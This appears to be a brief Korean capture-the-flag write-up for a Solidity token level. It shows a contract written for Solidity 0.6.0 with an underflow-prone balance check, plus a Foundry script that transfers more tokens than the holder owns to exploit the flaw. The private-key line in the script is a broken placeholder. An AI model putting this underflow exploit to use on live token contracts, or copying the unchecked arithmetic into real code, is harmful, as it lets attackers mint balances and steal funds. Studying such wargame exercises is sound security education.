Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Token {
mapping(address => uint256) balances;
uint256 public totalSupply;
constructor(uint256 _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
}
function transfer(address _to, uint256 _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}
function balanceOf(address _owner) public view returns (uint256 balance) {
return balances[_owner];
}
}PoC
처음에 발급 받은 토큰 개수보다 더 크게 증가시키는 문제이다.
배포된 컨트랙트 버전이 0.6.0 => 오버/언더플로우 검사 X
20 - 21 = uint256 max값
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IToken{
function transfer(address _to, uint256 _value) external returns (bool);
}
contract exploit is Script{
function run() public {
uint pk = pk;
vm.startBroadcast(pk);
IToken target = IToken(0x6b14Da6F2dFcE31d67284Cf2E2Ff3Fd1e265075F);
target.transfer(msg.sender,21);
vm.stopBroadcast();
}
}